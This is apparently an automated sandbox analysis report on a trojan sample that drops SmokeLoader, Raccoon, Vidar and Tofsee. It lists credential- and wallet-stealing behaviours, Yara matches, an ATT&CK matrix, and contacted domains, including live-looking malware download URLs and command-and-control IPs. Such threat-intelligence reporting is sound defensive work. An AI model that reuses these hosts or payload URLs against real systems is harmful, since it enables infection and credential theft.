Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\E61.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\E61.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Contains functionality to steal Internet Explorer form passwords

Show sources

Source: C:\Users\user\AppData\Local\Temp\49B.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

22_2_0043497C

Source: Yara match

File source: 00000019.00000002.457312724.000000000267D000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000027.00000002.601848015.0000000002DA1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.559576605.0000000000371000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.GzsKHwvBmG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.GzsKHwvBmG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.hhiwwui.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.1.hhiwwui.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.308302159.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.370106041.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.308352184.00000000006A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.370292791.00000000005E1000.00000004.00000001.sdmp, type: MEMORY

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 22.0.49B.exe.4920e50.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.4920e50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.49B.exe.4920e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.49B.exe.49d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.49B.exe.49d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.49B.exe.4920e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.410473881.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.409608494.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.382884263.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.393584726.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.419422214.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.400296473.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.416098242.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.650305946.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.424554766.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.465918061.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.398407236.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.448938859.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.459235582.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.436435697.000000000046C000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 49B.exe PID: 3092, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 25.2.E61.exe.40a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.E61.exe.4170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.E61.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.E61.exe.40a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.E61.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.E61.exe.4170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.458901650.00000000040A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.389564548.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: E61.exe PID: 2964, type: MEMORYSTR

Yara detected Tofsee

Show sources

Source: Yara match	File source: 00000021.00000002.448334222.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.415728419.0000000002E80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.452136750.0000000002E40000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping2	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer14	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Windows Service1	Windows Service1	Obfuscated Files or Information3	Credentials in Registry1	File and Directory Discovery4	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Standard Port11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution1	Logon Script (Mac)	Process Injection512	Software Packing14	Credentials In Files1	System Information Discovery166	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol25	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Security Software Discovery461	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Virtualization/Sandbox Evasion141	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading21	Proc Filesystem	Process Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion141	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection512	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
GzsKHwvBmG.exe	43%	Virustotal		Browse
GzsKHwvBmG.exe	46%	ReversingLabs	Win32.Trojan.Sabsik
GzsKHwvBmG.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\E61.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\49B.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\40A0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1AB6.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2612.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\hhiwwui	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	Metadefender	Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.GzsKHwvBmG.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.1.GzsKHwvBmG.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.GzsKHwvBmG.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.2.hhiwwui.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
25.2.E61.exe.40a0e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
17.1.hhiwwui.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.1.hhiwwui.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
22.1.49B.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
25.3.E61.exe.4170000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/259f84897d08382fc97b5383558dbe35eed6ef86	0%	Avira URL Cloud	safe
http://secureteam.net/webservices/T	0%	Virustotal		Browse
http://secureteam.net/webservices/T	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://188.34.200.103/vcruntime140.dll	2%	Virustotal		Browse
http://188.34.200.103/vcruntime140.dll	0%	Avira URL Cloud	safe
http://188.34.200.103/msvcp140.dll	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://188.119.112.104/v2	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
http://188.119.112.104/-	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://secureteam.net/webservices/TU	0%	Avira URL Cloud	safe
http://secureteam.net/webservices/Y	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
http://188.34.200.103/softokn3.dll	0%	Avira URL Cloud	safe
http://188.34.200.103/824	0%	Avira URL Cloud	safe
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff	0%	Avira URL Cloud	safe
http://188.34.200.103/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://r3.i.lencr.org/0Y	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://readinglistforaugust3.xyz/	100%	Avira URL Cloud	malware
http://www.typography.netD	0%	URL Reputation	safe
http://secureteam.net/ErrorReporting.asmx	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://188.119.112.104/	0%	Avira URL Cloud	safe
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff7	0%	Avira URL Cloud	safe
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff0	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://telete.in/xylichanjk	0%	Avira URL Cloud	safe
https://telete.in/org/img/t_logo.png	0%	URL Reputation	safe
http://188.34.200.103/nss3.dll	0%	Avira URL Cloud	safe
http://secureteam.net/webservices/CreateErrorReport	0%	Avira URL Cloud	safe
http://realete.in/	0%	Avira URL Cloud	safe
http://readinglistforaugust3.xyz/reestr.exe	100%	Avira URL Cloud	malware
https://activity.windows.comr	0%	URL Reputation	safe
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcffftd	0%	Avira URL Cloud	safe
http://readinglistforaugust3.xyz/raccon.exe	100%	Avira URL Cloud	malware
http://swretjhwrtj.gq/@Rarenut0.exe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://188.34.200.103/freebl3.dll	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
mx1.ocps.net.gslb.pphosted.com	67.231.144.32	true	false	high
eur.olc.protection.outlook.com	104.47.18.161	true	false	high
mail.mailerhost.net	18.237.235.220	true	false	high
r-smtp6.korea.com	119.205.212.219	true	false	high
z-p42-instagram.c10r.instagram.com	157.240.17.174	true	false	high
mx.invalid.nl	82.94.250.247	true	false	high
mx3.qq.com	203.205.219.57	true	false	high
defeatwax.ru	193.56.146.188	true	false	high
swretjhwrtj.gq	172.67.216.236	true	false	high
mx195.mb5p.com	157.230.233.4	true	false	high
smtpz4.laposte.net	160.92.124.66	true	false	high
eduarroma.tumblr.com	74.114.154.18	true	false	high
www.google.fr	142.250.203.99	true	false	high
mx.powered.name	62.141.42.208	true	false	high
assp.beotel.net	194.106.162.44	true	false	high
www.google.com	216.58.215.228	true	false	high
fastpool.xyz	213.91.128.133	true	false	high
mx37.m1bp.com	157.230.233.4	true	false	high
gorodok.net	5.128.82.36	true	false	high
readinglistforaugust3.xyz	212.224.105.79	true	false	high
live-com.olc.protection.outlook.com	104.47.74.33	true	false	high
mail.happyisp.com	34.212.139.205	true	false	high
mail.h-email.net	34.223.6.127	true	false	high
www.google.nl	172.217.168.3	true	false	high
mx156.hostedmxserver.com	37.139.4.118	true	false	high
consent.google.co.uk	172.217.168.46	true	false	high
yabs.yandex.ru	87.250.250.91	true	false	high
outlook-com.olc.protection.outlook.com	104.47.66.33	true	false	high
mx.optimum.net	167.206.4.79	true	false	high
sotke.com	170.39.76.102	true	false	high
readinglistforaugust2.xyz	95.213.224.6	true	false	high
smtp.yopmail.com	87.98.164.155	true	false	high
163mx01.mxmail.netease.com	220.181.14.135	true	false	high
mail.telkomsa.net	105.187.200.240	true	false	high
www.google.co.uk	172.217.168.67	true	false	high
msn-com.olc.protection.outlook.com	104.47.58.161	true	false	high
mx1.seznam.cz	77.75.78.42	true	false	high
relay05.kiev.sovam.com	188.163.244.254	true	false	high
m.youtube.com	216.58.215.238	true	false	high
telete.in	195.201.225.248	true	false	high
hotmail-com.olc.protection.outlook.com	104.47.57.161	true	false	high
mx3.naver.com	125.209.222.14	true	false	high
mx00.mail.com	74.208.5.20	true	false	high
hotmail.com	unknown	unknown	false	high
linden.gute.se	unknown	unknown	false	high
live.co.uk	unknown	unknown	false	high
hotm.com	unknown	unknown	false	high
auth.api.np.ac.playstation.net	unknown	unknown	false	high
live.com	unknown	unknown	false	high
qq.com	unknown	unknown	false	high
verat.net	unknown	unknown	false	high
naver.com	unknown	unknown	false	high
telkomsa.net	unknown	unknown	false	high
ocps.net	unknown	unknown	false	high
vyahoo.com	unknown	unknown	false	high
korea.com	unknown	unknown	false	high
readinglistforaugust1.xyz	unknown	unknown	false	high
seznam.cz	unknown	unknown	false	high
svitonline.com	unknown	unknown	false	high
doctor.com	unknown	unknown	false	high
iinden.gute.se	unknown	unknown	false	high
foxmail.com	unknown	unknown	false	high
optonline.net	unknown	unknown	false	high
yopmail.com	unknown	unknown	false	high
superdada.it	unknown	unknown	false	high
77.52.17.84.in-addr.arpa	unknown	unknown	false	high
hotmail.co.uk	unknown	unknown	false	high
invalid.nl	unknown	unknown	false	high
163.com	unknown	unknown	false	high
stargateworld.com	unknown	unknown	false	high
hongkong.com	unknown	unknown	false	high
celebslive.net	unknown	unknown	false	high
hindholmsem.dk	unknown	unknown	false	high
msn.com	unknown	unknown	false	high
outlook.com	unknown	unknown	false	high
www.instagram.com	unknown	unknown	false	high
mx.gorodok.net	unknown	unknown	false	high
api.ip.sb	unknown	unknown	false	high
ironfox.it	unknown	unknown	false	high
laposte.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/259f84897d08382fc97b5383558dbe35eed6ef86	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/vcruntime140.dll	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://188.34.200.103/msvcp140.dll	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/softokn3.dll	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/824	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/	false	Avira URL Cloud: safe	unknown
http://readinglistforaugust3.xyz/	true	Avira URL Cloud: malware	unknown
http://188.119.112.104/	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/nss3.dll	false	Avira URL Cloud: safe	unknown
http://readinglistforaugust3.xyz/reestr.exe	true	Avira URL Cloud: malware	unknown
http://readinglistforaugust3.xyz/raccon.exe	true	Avira URL Cloud: malware	unknown
http://swretjhwrtj.gq/@Rarenut0.exe	false	Avira URL Cloud: safe	unknown
http://188.34.200.103/freebl3.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000B.00000002.311757833.000002603723D000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000B.00000002.311781895.000002603724E000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
http://secureteam.net/webservices/T	B72.exe, 00000017.00000000.382925892.0000000000E62000.00000002.00020000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000B.00000003.311291629.0000026037241000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://appexmapsappupdate.blob.core.windows.net	svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	false		high
http://www.urwpp.deDPlease	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.bingmapsportal.com	svchost.exe, 0000000B.00000002.311703876.0000026037213000.00000004.00000001.sdmp	false		high
http://188.119.112.104/v2	49B.exe, 00000016.00000002.646166014.0000000003030000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.root-x1.letsencrypt.org0	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000B.00000003.311258325.0000026037245000.00000004.00000001.sdmp	false		high
http://cps.letsencrypt.org0	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000B.00000002.311757833.000002603723D000.00000004.00000001.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	B72.exe, 00000017.00000002.638343720.0000000001640000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://188.119.112.104/-	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000B.00000002.311703876.0000026037213000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000009.00000002.585721749.000001FB9E444000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000B.00000003.289477965.0000026037232000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://secureteam.net/webservices/TU	B72.exe, 00000017.00000000.382925892.0000000000E62000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://secureteam.net/webservices/Y	B72.exe, 00000017.00000000.382925892.0000000000E62000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000B.00000002.311781895.000002603724E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	false		high
http://188.119.112.104//l/f/SRCFdHsBPvGyIjkLejU_/cbe8b35942fedca555bc8bd12e2be781ce7cfcff	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000B.00000003.311204300.000002603725A000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/	svchost.exe, 00000005.00000002.621112588.000002A5C12AD000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehpLMEMh	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000B.00000002.311757833.000002603723D000.00000004.00000001.sdmp	false		high
http://r3.i.lencr.org/0Y	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000B.00000003.311291629.0000026037241000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000B.00000003.311171598.0000026037261000.00000004.00000001.sdmp	false		high
http://www.typography.netD	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000B.00000003.289477965.0000026037232000.00000004.00000001.sdmp	false		high
http://secureteam.net/ErrorReporting.asmx	B72.exe	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000006.00000000.287773710.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/enumeration	svchost.exe, 00000005.00000002.621112588.000002A5C12AD000.00000004.00000001.sdmp	false		high
http://x1.c.lencr.org/0	49B.exe, 00000016.00000002.646288053.000000000303D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
